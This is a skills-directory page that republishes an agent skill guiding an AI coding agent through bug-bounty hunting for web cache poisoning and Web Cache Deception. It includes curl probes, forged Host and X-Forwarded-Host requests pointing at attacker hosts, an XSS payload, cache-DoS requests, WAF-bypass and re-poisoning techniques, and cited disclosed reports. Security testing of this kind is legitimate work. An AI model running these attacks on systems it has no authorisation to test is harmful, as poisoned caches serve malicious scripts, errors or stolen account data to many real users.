Agent skill

Hunt Cache Poison

by elementalsouls in elementalsouls/Claude-BugHunter

Hunting skill for cache poison vulnerabilities. An agent skill from elementalsouls/Claude-BugHunter.

MITAuto-check passedSecurity

Install Hunt Cache Poison

skills CLI
$ npx skills add elementalsouls/Claude-BugHunter --skill hunt-cache-poison -a claude-code

Project install by default; add -g for ~/.claude/skills/.

GitHub CLI
$ gh skill install elementalsouls/Claude-BugHunter hunt-cache-poison --agent claude-code

Project scope by default; add --scope user for a personal install. Needs GitHub CLI 2.90.0 or later (public preview).

Manual copy
$ git clone --depth 1 https://github.com/elementalsouls/Claude-BugHunter.git skills-src && mkdir -p .claude/skills && cp -r skills-src/skills/hunt-cache-poison .claude/skills/hunt-cache-poison && rm -rf skills-src

Use ~/.claude/skills/ instead of .claude/skills for a personal install. The folder must contain SKILL.md.

Claude Code skills documentation · loads skills from .claude/skills/

Facts

Skill name
hunt-cache-poison
GitHub stars
4.8k
Token cost
~5.7k tokens
SKILL.md length
2,520 words
Files
1
Skills in repo
19
Repo updated
First seen
Licence
MIT

At a glance

Hunting skill for cache poison vulnerabilities. An agent skill from elementalsouls/Claude-BugHunter.

  • Works in 10 steps: Map cache infrastructure. Send a GET to… → Identify cache key components. Send two… → Test unkeyed header reflection. Add… → …
  • Hunting cache poisoning
  • SKILL.md covers Crown Jewel Targets, Autonomous Testing Priority, Attack Surface Signals and Step-by-Step Hunting Methodology, plus 7 more sections
  • Calls curl; reaches paypal.com

What it does

Hunt Cache Poison is an agent skill from elementalsouls/Claude-BugHunter. Hunting skill for cache poison vulnerabilities. Built from 10 public bug bounty reports including X-Forwarded-Host poisoning, X-HTTP-Method-Override / GCS cache, reflected→stored XSS via cache, classic Omer-Gil Web Cache Deception, Cloudflare Cache Deception Armor bypass, session-token cache deception, Akamai hop-by-hop smuggling → server-side edge poisoning, and Kettle's 2024 path-normalization WCD against Cloudflare/Fastly/GCP. Host/X-Forwarded-Host injection that reaches app logic (reset-link poisoning…

Its SKILL.md is about 5.7k tokens, which your agent loads only when the skill is triggered. It is a single SKILL.md file with no bundled scripts.

It sits in Security, covering Web application vulnerabilities, Bug bounty and Database schema design. It works with Cloudflare and Google Cloud. The repository describes itself as: A Claude Code skill bundle for bug hunting and external red-team work - 82 skills, 15 slash commands, 681 disclosed-report patterns curated across 24 core vulnerability classes… The licence is MIT.

When your agent uses it

  • Hunting cache poisoning
  • Web Cache Deception
  • CDN-fronted apps

Example prompts

  • “/hunt-cache-poison”

Workflow steps

10 steps, taken from the first numbered list in SKILL.md.

  1. Map cache infrastructure. Send a GET to the target and inspect response headers. Identify the caching layer (Cloudflare, Fastly, Varnish…
  2. Identify cache key components. Send two identical requests — if Age increments, the response is cached. Vary headers one-by-one (e.g., add…
  3. Test unkeyed header reflection. Add X-Forwarded-Host: evil.com and check if the value appears in the response body (redirects, canonical…
  4. Test URL path manipulation (Web Cache Deception). Append fake static extensions to dynamic endpoints
  5. Test for DoS via cache poisoning. Send a request with a header that causes a 4xx/5xx error and check if that error response gets cached
  6. Confirm unkeyed parameter poisoning. Try query parameter fatigue or HTTP parameter pollution
  7. Validate cache storage. After sending a potentially poisoned request, immediately request the same URL WITHOUT the malicious header from a…
  8. Measure cache TTL. Check Cache-Control: max-age and Age to understand how long the poison persists and whether it's exploitable before…
  9. Check affiliate/link flows specifically. For platforms like Linkpop, test whether the referrer/product URL is embedded in a cacheable…
  10. Document blast radius. Determine: global CDN edge (worldwide), regional cache, or single-server cache. This directly affects severity…

What it can do on your machine

Read from SKILL.md and the folder at commit ec51cd4. It shows what the files ask for, not the result of running them.

  • Tool permissions

    Pre-approves nothing: there is no allowed-tools line, so your agent's usual permission prompts apply.

    From allowed-tools in the SKILL.md frontmatter.

  • Runs code

    Shell commands in SKILL.md call:

    • curl

    From the folder's file list and the shell code blocks in SKILL.md.

  • Network

    Hosts in commands or code, which the agent is likely to contact:

    • paypal.com

    Also links to:

    • hackerone.com
    • omergil.blogspot.com
    • medium.com
    • portswigger.net

    From URLs in SKILL.md, links to its own repository left out.

  • Credentials

    Names no API keys, tokens, secrets or passwords.

    From names ending in _API_KEY, _TOKEN, _SECRET, _KEY or _PASSWORD in SKILL.md.

Context cost

Hunt Cache Poison loads about 5.7k tokens when it runs. Until then it costs about 188 tokens; SKILL.md has 2,520 words of instructions outside code blocks.

Always · name and description, kept in context so the agent knows when to use it
~188
When it runs · the whole SKILL.md, loaded when a task matches
~5.7k

Estimates: characters ÷ 4, the usual rule of thumb; real counts depend on the model's tokenizer. Scripts and assets cost tokens only if the agent reads them.

Safety

Auto-check passed

The automated check found no risky patterns in SKILL.md.

Automated static check — not a guarantee. Review scripts before installing. It scans the text of SKILL.md for risky patterns (piping downloads into a shell, reading credential files, hidden Unicode, destructive commands); files beside SKILL.md are not scanned.

SKILL.md

The full file from elementalsouls/Claude-BugHunter at commit ec51cd4, republished under its MIT licence (© elementalsouls). 2,520 words, ~5,745 tokens.

Download SKILL.mdSave it as .claude/skills/hunt-cache-poison/SKILL.md (or your agent's skills folder).
name
hunt-cache-poison
description
Hunting skill for cache poison vulnerabilities. Built from 10 public bug bounty reports including X-Forwarded-Host poisoning, X-HTTP-Method-Override / GCS cache, reflected→stored XSS via cache, classic Omer-Gil Web Cache Deception, Cloudflare Cache Deception Armor bypass, session-token cache deception, Akamai hop-by-hop smuggling → server-side edge poisoning, and Kettle's 2024 path-normalization WCD against Cloudflare/Fastly/GCP. Host/X-Forwarded-Host injection that reaches app logic (reset-link poisoning, routing SSRF, OAuth issuer) is owned by hunt-host-header; this skill owns the case where the poisoned response is CACHED and served to other users. Use when hunting cache poisoning, Web Cache Deception, CDN-fronted apps.
sources
github, hackerone_public, portswigger_research, omergil_research, youstin_research
report_count
8

Crown Jewel Targets

Cache poisoning is high-value because a single poisoned cache entry can affect thousands or millions of victims simultaneously — one request, mass exploitation. Payout scales with blast radius.

Highest-value targets:

  • CDN-served assets (cdn.shopify.com, cloudfront distributions, Fastly/Akamai edges) — poisoning these affects every visitor globally
  • E-commerce platforms with affiliate/referral flows (Shopify, WooCommerce storefronts) — session hijack or affiliate fraud potential
  • Gaming platforms with update servers (rockstargames updates.* domains) — DoS on update delivery = widespread client breakage
  • Authentication endpoints served through caches — leads to account takeover (the highest severity variant)
  • Asset CDNs (JS/CSS delivery) — XSS payload delivery at scale
  • SaaS multi-tenant platforms — one poisoned response bleeds into all tenants sharing a cache key

Asset types that pay most: CDN hostnames, subdomain-per-tenant patterns, update/download servers, login/account pages cached incorrectly, affiliate link shorteners.


Autonomous Testing Priority

Two distinct attacks live under this skill — target the simpler one first.

Attack 1 — Password Reset Poisoning (Host header injection):

The app uses the Host header to construct the password reset link in the email. Inject an attacker-controlled hostname; the victim's reset email contains a link to your server.

POST /forgot-password
Host: attacker.com
X-Forwarded-Host: attacker.com
X-Host: attacker.com

email=victim@target.com
Content-Type: application/x-www-form-urlencoded

Use a distinctive hostname you control or can identify in the response. Proof: the injected hostname appears in the response body (some apps reflect the generated reset link), or the action succeeds (2xx with a "reset email sent" message) after injection — confirming the poisoned link would be sent to the victim.

Try multiple host headers — apps vary in which one they trust (X-Forwarded-Host is most common, but Host itself also works when the proxy passes it through).

Attack 2 — Web Cache Poisoning:

Inject the attacker-controlled hostname into X-Forwarded-Host on a GET request for a cacheable page. If the hostname is reflected in the response body AND the response gets cached, subsequent visitors receive the poisoned response.

Check for cache signals in the response: X-Cache: HIT, CF-Cache-Status: HIT, Age: <nonzero>, or Via: cloudfront/varnish/fastly.

Proof for both: injected value reflected in response body, or action completed successfully despite the manipulated header.


Attack Surface Signals

URL patterns to look for:

  • cdn., assets., static., updates., downloads. subdomains
  • URL path structures with extensions that look static: /path/to/page.css, /account.php/nonexistent.jpg
  • Affiliate/link shortener endpoints: /link/, /go/, /ref/, /out/
  • Paths that mix dynamic content with cacheable-looking URLs

Response headers that signal a cache:

X-Cache: HIT / MISS
X-Cache-Status: HIT
CF-Cache-Status: HIT / MISS (Cloudflare)
Age: <nonzero>
Via: 1.1 varnish / cloudfront / fastly
Cache-Control: public, max-age=...
Surrogate-Control: max-age=...
X-Served-By: cache-...

JS/tech stack signals:

  • Fastly, Varnish, Cloudfront, Akamai, Nginx proxy_cache in response headers
  • Shopify/Linkpop stacks with third-party integrations
  • Platforms using path-based routing without normalizing trailing segments
  • Servers that reflect unvalidated headers into responses (Host, X-Forwarded-Host, X-Original-URL)

Dangerous header candidates (unkeyed inputs):

X-Forwarded-Host
X-Host
X-Forwarded-Scheme
X-Original-URL
X-Rewrite-URL
Forwarded
X-HTTP-Method-Override

Step-by-Step Hunting Methodology

  1. Map cache infrastructure. Send a GET to the target and inspect response headers. Identify the caching layer (Cloudflare, Fastly, Varnish, Nginx). Note Age, X-Cache, CF-Cache-Status headers.

  2. Identify cache key components. Send two identical requests — if Age increments, the response is cached. Vary headers one-by-one (e.g., add X-Forwarded-Host) to determine which headers are NOT included in the cache key (unkeyed).

  3. Test unkeyed header reflection. Add X-Forwarded-Host: evil.com and check if the value appears in the response body (redirects, canonical links, CSP headers, JS src attributes, meta tags). Append a unique cache-busting query parameter (e.g. ?cb=<random>) so the probe lands on a cache MISS under a throwaway key — this verifies reflection without prematurely storing a live poison entry under the real, victim-shared cache key. (Param Miner's "Guess headers" mode is the canonical Burp tool for discovering these unkeyed headers/parameters automatically.)

  4. Test URL path manipulation (Web Cache Deception). Append fake static extensions to dynamic endpoints:

    • GET /account/profile.css
    • GET /dashboard/settings.jpg
    • GET /affiliate-link/target.js Check if the server returns dynamic content AND the cache stores it.
  5. Test for DoS via cache poisoning. Send a request with a header that causes a 4xx/5xx error and check if that error response gets cached:

    • Malformed Host header
    • X-Forwarded-Host pointing to an invalid host
    • Oversized headers that trigger backend errors
  6. Confirm unkeyed parameter poisoning. Try query parameter fatigue or HTTP parameter pollution:

    • GET /page?utm_source="><script>alert(1)</script> Check if the param is reflected and cached for clean requests to /page.
  7. Validate cache storage. After sending a potentially poisoned request, immediately request the same URL WITHOUT the malicious header from a different IP or incognito session. If you receive the poisoned response — it's confirmed.

  8. Measure cache TTL. Check Cache-Control: max-age and Age to understand how long the poison persists and whether it's exploitable before expiry.

  9. Check affiliate/link flows specifically. For platforms like Linkpop, test whether the referrer/product URL is embedded in a cacheable response that another user will receive.

  10. Document blast radius. Determine: global CDN edge (worldwide), regional cache, or single-server cache. This directly affects severity rating.


Payload & Detection Patterns

Confirm caching behavior:

bash
# Send twice, compare Age header
curl -s -I "https://target.com/page" | grep -i "age\|x-cache\|cf-cache"
curl -s -I "https://target.com/page" | grep -i "age\|x-cache\|cf-cache"

Test unkeyed X-Forwarded-Host:

bash
curl -s -H "X-Forwarded-Host: evil.attacker.com" \
  "https://target.com/page" | grep -i "evil.attacker.com"

Test Web Cache Deception (path appending):

bash
# Authenticated session cookie required
curl -s -b "session=YOUR_SESSION" \
  "https://target.com/account/profile.css"

# Then fetch without auth from another client
curl -s "https://target.com/account/profile.css"

Force cache miss to test poison without hitting cached version:

bash
# Use a unique cache-busting query param to land on a fresh key — do NOT rely on
# client-sent "Cache-Control: no-cache" (per RFC 7234 it requests revalidation, not
# skip-storage, and Cloudflare/Fastly/Akamai generally ignore it on cacheable assets).
curl -s -H "X-Forwarded-Host: canary.attacker.com" \
     "https://target.com/page?cb=$RANDOM"

DoS via poisoned error response:

bash
curl -s -H "X-Forwarded-Host: aaaaaaaaaaa.invalid" \
  "https://target.com/js/app.js" -I
# Check if next clean request returns error
curl -s -I "https://target.com/js/app.js" | grep "HTTP/"

Grep patterns in Burp/ZAP response history:

# Headers indicating cache hit
X-Cache: HIT
CF-Cache-Status: HIT
Age: [1-9]

# Reflected unkeyed input in body
evil\.attacker\.com
canary\d+\.

# Web cache deception indicators
Content-Type: text/css  (but response is HTML/JSON)
Cache-Control: public.*max-age  (on authenticated endpoint)

Parameter pollution test:

bash
curl -s "https://target.com/page?cb=1&param=CANARY_VALUE" | grep CANARY_VALUE
# Then check if clean request returns poisoned version
curl -s "https://target.com/page?cb=1"

Burp Suite Intruder wordlist for unkeyed headers:

X-Forwarded-Host
X-Host
X-Forwarded-Server
X-HTTP-Host-Override
Forwarded
X-Original-URL
X-Rewrite-URL
X-Forwarded-Scheme
X-Forwarded-Proto
True-Client-IP

Origin header → ACAO cache poisoning

Add Origin to the unkeyed-header set. Test whether it is reflected into Access-Control-Allow-Origin and then cached: curl -H "Origin: evil.example" URL -I on two consecutive hits. A cached attacker/* ACAO breaks CORS for legit users (cache-DoS); a cached permissive ACAO enables cross-user data reads. Disclosed: reports/591302.

Common Root Causes

  1. CDN misconfiguration — caching based on URL path only. Engineers configure cache rules like "cache everything matching *.js" without realizing the path can be appended to dynamic routes. The origin server ignores the extra path segments, but the CDN uses them as cache keys.

  2. Unkeyed header forwarding. Developers configure reverse proxies to forward X-Forwarded-Host to backends for URL generation (canonical links, redirects, password reset emails) without including it in the cache key. The CDN caches the poisoned response.

  3. Web Cache Deception via permissive routing. Frameworks that normalize URLs (e.g., Rails, Express) accept /account/settings.css and serve the same response as /account/settings. The CDN sees a .css extension and applies aggressive caching rules.

  4. Shared caching of multi-tenant responses. SaaS platforms that use a single CDN without tenant isolation in the cache key allow cross-tenant cache poisoning.

  5. Error responses cached without thought. Backend errors (404, 500) triggered by attacker-controlled input get cached, causing DoS for legitimate users. Developers implement caching without excluding error status codes.

  6. Lazy Vary header implementation. Developers know they should add Vary: X-Forwarded-Host but forget, or CDNs strip/ignore Vary headers entirely (Cloudflare historically strips Vary on some asset types).

  7. Third-party integrations with URL reflection. Affiliate/link tracking systems (like Shopify Linkpop) reflect the destination URL in metadata, canonical tags, or redirects — and these get cached globally.


Bypass Techniques

Defense: WAF blocking known poison headers

  • Bypass: Use less-common header variants: X-Host, X-Forwarded-Server, X-HTTP-Host-Override, Forwarded: host=evil.com, X-Original-URL
  • Bypass: Header value encoding: X-Forwarded-Host: evil%2ecom
  • Bypass: Case variation: x-forwarded-host, X-FORWARDED-HOST

Defense: Stripping attacker-supplied headers at edge

  • Bypass: Use HTTP/2 pseudo-header manipulation if the proxy downgrades to HTTP/1.1
  • Bypass: Inject via HTTP Request Smuggling — smuggle a request with poison headers past the WAF to hit the cache server directly

Defense: Require authentication before caching

  • Bypass: Web Cache Deception — trick the cache into storing authenticated content by appending .css/.js to the URL, which matches a cache rule that ignores auth

Defense: Cache key includes full URL with query string

  • Bypass: HTTP Parameter Pollution — some parsers take the first occurrence, caches key on full string; inject ?legit=1&param=evil and cache stores it under ?legit=1&param=evil but victim visits ?legit=1
  • Bypass: Fat GET request — send body parameters that the backend processes but the cache ignores

Defense: Short TTL / rapid cache purging

  • Bypass: Automate re-poisoning; send the poison request in a loop just ahead of TTL expiry
  • Bypass: Target CDN nodes with longer default TTLs by routing requests through specific PoPs

Defense: Cache-Control: private on sensitive endpoints

  • Bypass: Check if CDN respects this header (some CDNs ignore it if an admin has overridden cache rules globally)
  • Bypass: Find adjacent cacheable endpoints that reflect the same sensitive data

Gate 0 Validation

  1. What can the attacker DO right now? The attacker must be able to poison a cache entry and then demonstrate that a separate, unauthenticated request from a different client/IP receives the poisoned response — not just their own browser. If only the attacker sees the effect, it's not cache poisoning.

  2. What does the victim LOSE? Must be one of: (a) session/account compromise via reflected credentials in poisoned response, (b) execution of attacker-controlled JS via poisoned asset, (c) service denial where legitimate requests return error responses, or (d) sensitive data disclosure (account details cached and served to other users). "Weird response headers" alone is not impact.

  3. Can it be reproduced in 10 minutes from scratch? You must be able to: send the poisoning request → wait for cache store → fetch the URL from incognito/different IP → observe poisoned response. If you can't demonstrate this clean reproduction with a second client, the cache may not actually be storing the poison and the report isn't ready.


Show full SKILL.md (1,053 more words)Show less

Real Impact Examples

Scenario 1 — Mass DoS on CDN Asset Delivery (Shopify CDN) An attacker identified that CDN-served JavaScript assets on cdn.shopify.com could be poisoned by sending a request with a crafted header that caused the origin to return a 4xx error. The CDN cached this error response. Any merchant storefront loading that asset then received the cached error instead of the valid JS file — breaking checkout flows and storefront functionality across all stores sharing that CDN path. One HTTP request, global merchant impact, persisting until cache TTL expired.

Scenario 2 — Account Takeover via Web Cache Deception On a platform serving authenticated account pages, an attacker crafted a URL like /account/profile/photo.jpg and sent it to a victim (via phishing link). When the victim (authenticated) visited the URL, the server responded with their full account profile page (name, email, session tokens). Because the URL ended in .jpg, the CDN cached the authenticated response publicly. The attacker then fetched /account/profile/photo.jpg without authentication and received the victim's account data — enabling full account takeover. Impact was amplified because the cache served the same response to any subsequent requester.

Scenario 3 — Affiliate Link Hijacking via URL Path Manipulation (Shopify Linkpop) An attacker discovered that the Linkpop affiliate link service would cache responses based on URL path but reflected a manipulated product destination URL in the cached HTML. By visiting a specially crafted path before legitimate users, the attacker poisoned the cache to redirect affiliate clicks to an attacker-controlled domain instead of the legitimate Amazon product. Victims clicking what appeared to be valid merchant links were sent to attacker infrastructure, enabling credential phishing and loss of affiliate commission revenue for the legitimate merchant.


Disclosed Report Citations (2017-2024)

The following real, verified bug-bounty / coordinated-disclosure cases extend this skill. Spans the two major families: cache poisoning (attacker influences a cached response served to victims) and cache deception (attacker tricks the cache into storing a victim's private response).

  1. Shopify — Cache poisoning via X-Forwarded-Host (H1 #977851)

    • Subclass: X-Forwarded-Host header poisoning (unkeyed input → redirect/script-src corruption)
    • Payload: GET /any-path with X-Forwarded-Host: attacker.com — single request persisted attacker host in cached response across apps.shopify.com and localized subdomains
    • Root cause: X-Forwarded-Host influenced asset/redirect URL generation but was NOT part of the cache key
    • Year: 2020 — $1,300 → escalated to $6,300 (one-shot poison, multi-host blast radius)
  2. HackerOne — Cache poisoning DoS via X-Forwarded-Port (H1 #409370)

    • Subclass: X-Forwarded-Host / X-Forwarded-Port DoS (poisoned redirect to invalid port)
    • Payload: GET /<redirect-path> with X-Forwarded-Port: 1 — cached 301 redirect pointed legitimate users at port 1, breaking access
    • Root cause: trusted X-Forwarded-* headers in 301 redirect generation; cache stored the bad Location
    • Year: 2018 — $2,500 (foundational H1-on-H1 case)
  3. GitLab — Cache poisoning DoS via X-HTTP-Method-Override (H1 #1160407)

    • Subclass: method-cloaking / GCS cache-key bleed (HEAD response stored under GET key)
    • Payload: GET /assets/webpack/*.js with X-HTTP-Method-Override: HEAD — GCS backend honored the override and returned an empty body; CDN cached it as the canonical GET response
    • Root cause: CDN cache not method-aware; HEAD body (empty) overwrote GET entry for cached static assets
    • Year: 2021 — $2,500 (DoS normally OOS, paid for novelty)
  4. PayPal — Web Cache Deception (Omer Gil original) (Blog)

    • Subclass: classic WCD via .css/.jpg/etc. path appending on authenticated routes
    • Payload: GET https://www.paypal.com/myaccount/home/foo.css — origin served full authenticated account page; CDN cached it as "static .css" for ~5 hours
    • Root cause: origin routed unknown path suffixes to the parent dynamic handler; CDN cached based purely on the static-looking file extension
    • Year: 2017 — $3,000 (PortSwigger Top-10 Web Hacking Technique of 2017, #2)
  5. Cloudflare PBB — Cache Deception Armor bypass via .avif (H1 #1391635)

    • Subclass: CDN-specific allowlist bypass (Cloudflare's WCD protection feature) using an obscure image extension
    • Payload: GET https://<protected-origin>/account/me.avif — Cloudflare's Cache Deception Armor extension list omitted .avif, so the authenticated HTML response was cached
    • Root cause: Cache Deception Armor used a static, incomplete extension allowlist that did not cover modern image MIME types
    • Year: 2022 — Cloudflare PBB bounty (amount undisclosed)
  6. Akamai (PayPal/Airbnb/Goldman Sachs) — Hop-by-hop header smuggling → server-side edge poisoning (Tediosi & Mariani writeup)

    • Subclass: CDN-specific request-smuggling that lands attacker responses in Akamai's edge cache for nearby IPs
    • Payload: Connection: Content-Length + crafted request — Akamai's first proxy stripped Content-Length as hop-by-hop, second proxy treated body as a second request whose response was cached at the edge
    • Root cause: inconsistent handling of hop-by-hop headers across Akamai proxy tiers caused desync; smuggled responses were server-side cached globally
    • Year: 2022 — >$50K total across affected programs (PayPal $25,200 + Airbnb $14,875 + Goldman Sachs $100), PortSwigger Top-10 Web Hacking Techniques 2022 nominee
  7. James Kettle (PortSwigger) — "Gotta cache 'em all": path-normalization & WCD against Cloudflare/Fastly/GCP (PortSwigger Research)

    • Subclass: cache-key path normalization discrepancies and Web Cache Deception across major CDNs (Cloudflare, Fastly, GCP/Google Cloud) — the 2024 research named in this skill's description
    • Payload: origin-vs-cache delimiter/normalization disagreements (e.g. encoded path segments and static-suffix tricks) that cause the cache to store a dynamic/authenticated response under a static-looking key
    • Root cause: cache and origin disagree on how to normalize/parse the URL path, so the cache key does not match the resource the origin actually served
    • Year: 2024 — coordinated CDN-vendor disclosure; methodology research (no single bounty), PortSwigger Top-10 Web Hacking Techniques 2024 entry

  • hunt-xss — Cache poisoning is the multiplier that turns reflected XSS (low-severity self-inflicted) into stored XSS across every CDN-edge visitor. Chain primitive: X-Forwarded-Host: attacker.com poisons cached script src → cached response now contains <script src="//attacker.com/x.js"> → every visitor to that CDN edge executes attacker JS, persistent for the full Cache-Control max-age.
  • hunt-http-smuggling — Smuggling bypasses front-end cache-key normalization and WAF stripping of poison headers, hitting the cache server directly. Chain primitive: CL.TE smuggle delivers X-Forwarded-Host: attacker.com to the cache backend past the WAF that stripped it at the edge → poisoned entry stored under the victim's normal URL → de-sync poisoning where the smuggled request becomes the cached response for the next victim.
  • hunt-auth-bypass — Web Cache Deception turns authenticated pages into publicly-cached responses, leaking session-bound content to unauthenticated attackers. Chain primitive: /account/profile.css served as authenticated HTML, cached as static asset → attacker fetches same URL without auth and reads victim's email/tokens → session cookies in body → full ATO.
  • security-arsenal — Reach for the unkeyed-header wordlist (X-Forwarded-Host, X-Host, X-Forwarded-Server, X-HTTP-Host-Override, Forwarded, X-Original-URL) and the WCD path-extension list (.css, .js, .jpg, .ico, ;.css, %2e%2ecss) before hand-fuzzing.
  • triage-validation — Run the Pre-Severity Gate before claiming Critical: the poisoned response MUST be reproducible from a separate IP/incognito without your poison headers. If only your own browser sees the effect, it's a self-cache and N/A.

© elementalsouls, MIT. Rendered from Markdown: HTML in the file is shown as text, images as links, and headings moved down two levels. Raw file

Files

Just SKILL.md in skills/hunt-cache-poison of elementalsouls/Claude-BugHunter.

Open the folder on GitHubat commit ec51cd4

Compare with similar skills

Hunt Cache Poison next to the 5 skills that share the most tags, products or categories with it. Stars are the repository's; “used in” counts other GitHub owners with a copy.

Hunt Cache Poison compared with similar skills
SkillStarsUsed inTokensAuto-checkLicenceRepo updated
Hunt Cache Poison this skillelementalsouls/Claude-BugHunter4.8k—~5.7kAutomated safety check: PassMIT
Psalm Security Analysiscachethq/core230—~4.7kAutomated safety check: PassCustom licence
Security DjangoIgorWarzocha/Opencode-Workflows122—~1.6kAutomated safety check: NotesNone
Blueprint Cloudflare Securityreceptron/mulmoterminal237—~1.2kAutomated safety check: NotesMIT
Implementing Cloud Waf Rulesmukul975/Anthropic-Cybersecurity-Skills34k—~2.9kAutomated safety check: PassApache-2.0
Exploiting Prototype Pollution In Javascriptmukul975/Anthropic-Cybersecurity-Skills34k—~2.3kAutomated safety check: PassApache-2.0

Similar skills

  • Runs and interprets Psalm security (taint) analysis on a Laravel project.

    230 GitHub stars~4.7k tokensUpdated 4 days ago
    SecurityAuto-check passed
  • Security Django

    IgorWarzocha/Opencode-Workflows

    Review Django security audit patterns for settings and middleware.

    122 GitHub stars~1.6k tokensUpdated 8 mo ago
    SecurityAuto-check: notes
  • Blueprint Cloudflare Security

    receptron/mulmoterminal

    Review the finished Worker against OWASP Top 10:2025, fix what is exploitable, prove each fix with a test, and report.

    237 GitHub stars~1.2k tokensUpdated today
    SecurityAuto-check: notes
  • Implementing Cloud Waf Rules

    mukul975/Anthropic-Cybersecurity-Skills

    Deploys and tunes Web Application Firewall rules on AWS WAF, Azure WAF, and Cloudflare, covering managed rule sets, custom business-logic rules, rate limiting, bot management, and false-positive…

    34k GitHub stars~2.9k tokensUpdated 1 mo ago
    SecurityAuto-check passed
  • Exploiting Prototype Pollution In Javascript

    mukul975/Anthropic-Cybersecurity-Skills

    Detects and exploits JavaScript prototype pollution vulnerabilities in client-side and server-side (Node.js) applications to achieve XSS, RCE, or authentication bypass through property injection…

    34k GitHub stars~2.3k tokensUpdated 1 mo ago
    SecurityAuto-check passed
  • Bug Bounty

    awarexone/Agentic-Bug-Hunter

    Complete bug bounty workflow — recon, pre-hunt learning, vulnerability hunting (IDOR, SSRF, XSS, auth bypass, CSRF, race conditions, SQLi, XXE, file upload, business logic, GraphQL, HTTP smuggling…

    5.3k GitHub stars~20k tokensUpdated today
    SecurityAuto-check: warnings

More from elementalsouls/Claude-BugHunter

All 19 skills in this repo
  • Hunt Business Logic

    elementalsouls/Claude-BugHunter

    Hunting skill for business logic vulnerabilities. An agent skill from elementalsouls/Claude-BugHunter.

    4.8k GitHub starsUsed in 1 repo~4.4k tokens
    Auto-check passed
  • Hunt API Misconfig

    elementalsouls/Claude-BugHunter

    Hunt API security misconfiguration — mass assignment, prototype pollution, HTTP verb tampering.

    4.8k GitHub stars~4.5k tokensUpdated yesterday
    Auto-check passed
  • Hunt Ato

    elementalsouls/Claude-BugHunter

    Hunt account takeover taxonomy — 9 distinct paths to ATO, plus chains.

    4.8k GitHub stars~3.4k tokensUpdated yesterday
    Auto-check passed
  • Hunt Fintech Graphql

    elementalsouls/Claude-BugHunter

    Hunt fintech-specific GraphQL vulnerabilities: money-movement mutations (transfers, redemptions, withdrawals, card top-ups), ledger/balance/portfolio query IDOR, decimal-precision and rounding…

    4.8k GitHub stars~3.5k tokensUpdated yesterday
    Auto-check passed
  • Hunt HTTP Smuggling

    elementalsouls/Claude-BugHunter

    Hunt HTTP request smuggling (CL.TE, TE.CL, H2.CL, H2.TE). An agent skill from elementalsouls/Claude-BugHunter.

    4.8k GitHub stars~1.8k tokensUpdated yesterday
    Auto-check passed
  • Hunt JWT Crypto

    elementalsouls/Claude-BugHunter

    Hunt JWT cryptographic failures — alg:none signature-stripping and RS256→HS256 key-confusion that let an attacker forge a token for any identity (e.g.

    4.8k GitHub stars~2.3k tokensUpdated yesterday
    Auto-check passed

Categories

Questions about Hunt Cache Poison

What does Hunt Cache Poison do?

Hunting skill for cache poison vulnerabilities. An agent skill from elementalsouls/Claude-BugHunter. Hunt Cache Poison is an agent skill from elementalsouls/Claude-BugHunter. Hunting skill for cache poison vulnerabilities.

When should I use Hunt Cache Poison?

Hunt Cache Poison fits situations like: hunting cache poisoning; web Cache Deception; CDN-fronted apps.

How do I install Hunt Cache Poison in Claude Code?

Run `npx skills add elementalsouls/Claude-BugHunter --skill hunt-cache-poison -a claude-code`. Or copy the skill folder (skills/hunt-cache-poison in elementalsouls/Claude-BugHunter) into .claude/skills/hunt-cache-poison in your project. Claude Code loads it when a task matches its description.

How do I install Hunt Cache Poison in Codex?

Run `npx skills add elementalsouls/Claude-BugHunter --skill hunt-cache-poison -a codex`. Or copy the skill folder (skills/hunt-cache-poison in elementalsouls/Claude-BugHunter) into .agents/skills/hunt-cache-poison in your project. Codex loads it when a task matches its description.

Can I use Hunt Cache Poison in Cursor, Gemini CLI or GitHub Copilot?

Cursor, Gemini CLI, GitHub Copilot and OpenCode also load SKILL.md folders. With the skills CLI, run `npx skills add elementalsouls/Claude-BugHunter --skill hunt-cache-poison -a cursor` (or -a gemini-cli, github-copilot or opencode for the others). To copy it by hand, put the folder in .cursor/skills/hunt-cache-poison, .gemini/skills/hunt-cache-poison, .github/skills/hunt-cache-poison and .opencode/skills/hunt-cache-poison in your project.

What does Hunt Cache Poison need to run?

Going by SKILL.md and its folder, Hunt Cache Poison needs the command-line tools its instructions call (curl).

Does Hunt Cache Poison access the network?

SKILL.md names 5 domains. In commands or code: paypal.com; the agent is likely to contact it when it follows the instructions. As links in the text: hackerone.com, omergil.blogspot.com, medium.com and portswigger.net. This is read from the text; nothing was executed.

Is Hunt Cache Poison safe to install?

Our automated static check of SKILL.md found no risky patterns, such as piping downloads into a shell, reading credential files or hidden Unicode. It is not a guarantee. Review the folder before installing.

What licence does Hunt Cache Poison use?

Hunt Cache Poison is published under the MIT licence (the repository's licence). It allows redistribution, so the full SKILL.md is shown on this page.

How many tokens does Hunt Cache Poison use?

About 5.7k tokens (SKILL.md is roughly 23k characters). Agents keep only the skill's name and description in context until a task matches; then they load SKILL.md in full.

What are the alternatives to Hunt Cache Poison?

Skills that share tags, products or a category with Hunt Cache Poison: Psalm Security Analysis (cachethq/core, 230 stars), Security Django (IgorWarzocha/Opencode-Workflows, 122 stars), Blueprint Cloudflare Security (receptron/mulmoterminal, 237 stars) and Implementing Cloud Waf Rules (mukul975/Anthropic-Cybersecurity-Skills, 34k stars). The comparison table on this page puts their stars, adoption, token cost, safety result and licence side by side.

Who maintains Hunt Cache Poison?

elementalsouls (a GitHub user) maintains it in elementalsouls/Claude-BugHunter, which has 4,816 GitHub stars. The repository holds 19 skills in this directory. The repository was last updated on October 8, 2026.

Source: elementalsouls/Claude-BugHunter on GitHub. Facts on this page come from the repository at the commit we read; the author's words are quoted as theirs.